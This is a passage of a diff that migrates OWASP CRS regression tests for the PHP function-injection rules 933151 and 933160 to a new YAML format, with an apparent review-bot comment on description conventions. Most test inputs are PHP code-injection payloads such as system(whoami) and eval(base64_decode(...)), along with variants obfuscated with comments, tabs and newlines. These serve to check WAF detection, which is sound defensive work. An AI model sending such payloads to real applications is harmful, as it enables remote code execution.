933160)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?a=exploration" - version: "HTTP/1.1" - output: - no_log_contains: id "933151" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?a=exploration" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933151] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml index c3c835a35..8c561628e 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml 
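Review bot: Tests 1, 2 and 4 in this file all keep the identical description `desc: "pmf + chain"`, so with `test_title` gone the only thing that distinguishes them in a `--show-failures-only` report is the bare `test_id`. The neighbouring files in this series use the `desc: |` form with a `payload:` line (e.g. `PHP function call in query.` / `payload: chr(123)` in the 933160 hunk below), and this file should follow that convention, for example `desc: "pmf + chain, space before parenthesis; payload: array_diff ("` for test 1, the `date_ADD()` payload for test 2 and the `gethostbynamE(` POST body for test 4. Tests 3, 5, 6, 7 and 8 are negative cases; their `desc` values already explain the intent, but stating the payload there too would make the positive/negative pairing reviewable without decoding the `uri` field. Since the file now carries `rule_id: 933151` at the top, a cheap consistency check for the migration is that every `expect_ids`/`no_expect_ids` entry in the file equals that value, which holds for all eight tests here.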
@@ -1,680 +1,678 @@ --- meta: author: "lifeforms, Franziska Bühler, Max Leske, azurit" - description: None - enabled: true - name: 933160.yaml +rule_id: 933160 tests: - - test_title: 933160-1 + - test_id: 1 desc: | PHP function call in query. payload: chr(123) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=chr%28123%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=chr%28123%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 2 desc: | PHP function call with variable as parameter. payload: eval($foo) stages: - - stage: - input: - data: eval($foo) - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-3 + - input: + data: eval($foo) + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 3 desc: | PHP function call, CR, ($variable). 
payload: eval\r($foo) stages: - - stage: - input: - data: eval%0D%28%24foo%29 - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-4 + - input: + data: eval%0D%28%24foo%29 + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 4 desc: | PHP function call, LF, ('value'). payload: exec\n('bar') stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%0A%28%27bar%27%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%0A%28%27bar%27%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 5 desc: | PHP uppercase function call, CR, LF, (). 
payload: FILE\r\n() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=FILE%0D%0A%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=FILE%0D%0A%28%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 6 desc: | PHP function call with multiple whitespaces. payload: exec (blah) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%20%20%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%20%20%28blah%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 7 desc: | PHP function call using Error Control Operator. 
payload: @exec('test') stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=%40exec%28%27test%27%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=%40exec%28%27test%27%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 8 desc: | PHP function call with vertical tab. payload: exec (blah) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%09%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%09%28blah%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 9 desc: | PHP function call with comment and newline. 
payload: exec //comment\r\n (blah) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%20%2f%2fcomment%0d%0a%20%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%20%2f%2fcomment%0d%0a%20%28blah%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 10 desc: | PHP function call with comment and newline. payload: exec #comment\r\n (blah) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%20%23comment%0d%0a%20%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%20%23comment%0d%0a%20%28blah%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 11 desc: | PHP function call with comment and newline. 
payload: exec#\n () stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%23%0a%20%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%23%0a%20%28blah%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 12 desc: | PHP function call with comment, newline, and vertical tab. payload: exec \t #\n () stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%20%09%20%23%0a%20%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%20%09%20%23%0a%20%28%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 13 desc: | PHP function call with c-style comment syntax. 
payload: exec/*comment*/() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%2f%2acomment%2a%2f%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%2f%2acomment%2a%2f%28%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 14 desc: | PHP function call with c-style comment syntax and whitespaces. payload: exec /*comment*/ () stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?foo=exec%20%2f%2acomment%2a%2f%20%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?foo=exec%20%2f%2acomment%2a%2f%20%28%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 15 desc: | PHP function call with empry c-style comment syntax, whitespaces, and vertical tab. 
payload: exec \t/**/\t () stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%20%09%2f%2a%2a%2f%09%20%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%20%09%2f%2a%2a%2f%09%20%28%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 16 desc: | PHP function call with c-style comment syntax containing newline, whitespaces and vertical tab. payload: exec\t/*foo\r\nbar*/\t () stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%09%2f%2afoo%0d%0abar%2a%2f%09%20%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%09%2f%2afoo%0d%0abar%2a%2f%09%20%28%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 17 desc: | PHP function call in URI payload: substr() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 
- uri: "/get/substr()" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/substr()" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 18 desc: | PHP function call in URI, using mixed case payload: subSTR($x) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/subSTR%28%24x%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/subSTR%28%24x%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 19 desc: | PHP function call in URI with concatenated string/functions payload: eval(chr(112).chr(104).chr(112)) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=eval%28chr%28112%29.chr%28104%29.chr%28112%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 
"/get?x=eval%28chr%28112%29.chr%28104%29.chr%28112%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 20 desc: | PHP function call in URI payload: eval(gzinflate(str_rot13(base64_decode("") stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: '/get/eval(gzinflate(str_rot13(base64_decode("")' - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: '/get/eval(gzinflate(str_rot13(base64_decode("")' + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 21 desc: | PHP function call in URI, base64 encoded payload: payload: /eval(base64_decode('cGFwYWRhcHVwaSwK') stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/eval%28base64_decode%28%27cGFwYWRhcHVwaSwK%27%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/eval%28base64_decode%28%27cGFwYWRhcHVwaSwK%27%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 22 desc: | PHP function call in body payload: eval("echo 10000000000-245205634;") stages: - - stage: - input: - data: 
yt=eval%28%22echo+10000000000%2d245205634%3b%22%29%3b - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-23 + - input: + data: yt=eval%28%22echo+10000000000%2d245205634%3b%22%29%3b + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 23 desc: | PHP function call in body, mixed case payload: eVAl("echo 10000000000-245205634;") stages: - - stage: - input: - data: yt=eVAl%28%22echo+10000000000%2d245205634%3b%22%29%3b - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-24 + - input: + data: yt=eVAl%28%22echo+10000000000%2d245205634%3b%22%29%3b + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 24 desc: string function call stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=return%22system%22%28xyz%29.s" - 
version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=return%22system%22%28xyz%29.s" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 25 desc: | PHP function call payload: system(whoami) stages: - - stage: - input: - data: cmd=system(whoami) - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-26 + - input: + data: cmd=system(whoami) + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 26 desc: | PHP function call payload: (system)(whoami) stages: - - stage: - input: - data: cmd=(system)(whoami) - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-27 + - input: + data: cmd=(system)(whoami) + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: 
[933160] + - test_id: 27 desc: | PHP function system call in single quotes and parentheses payload: ('system')('whoami') stages: - - stage: - input: - data: cmd=('system')('whoami') - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-28 + - input: + data: cmd=('system')('whoami') + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 28 desc: | PHP system call in double quotes and parentheses payload: ("system")("whoami") stages: - - stage: - input: - data: cmd=("system")("whoami") - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-29 + - input: + data: cmd=("system")("whoami") + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 29 desc: | PHP system call in double quotes and parentheses, multiple spaces after command payload: ("system ")("whoami") stages: - - stage: - input: - data: cmd=("system ")("whoami") - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-30 + - input: + data: cmd=("system ")("whoami") + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 30 desc: | PHP string function call payload: return"system"(xyz).s stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=return%22system%22%28xyz%29.s" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=return%22system%22%28xyz%29.s" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 31 desc: | False Positive test, missing mandatory parenthesis payload: /eval( stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/eval(" - version: "HTTP/1.1" - output: - no_log_contains: id "933160" - - test_title: 933160-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/eval(" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933160] + - test_id: 32 desc: | False Positive test, missing mandatory parenthesis payload: eval stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=eval" - version: "HTTP/1.1" - output: - no_log_contains: id "933160" - - test_title: 933160-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=eval" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933160] + - test_id: 33 desc: | False Positive test payload: the files (yep) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=the%20files%20%28yep%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933160" - - test_title: 933160-34 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=the%20files%20%28yep%29" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933160] + - test_id: 34 desc: | PHP mixed case function call with space, LF between (). 
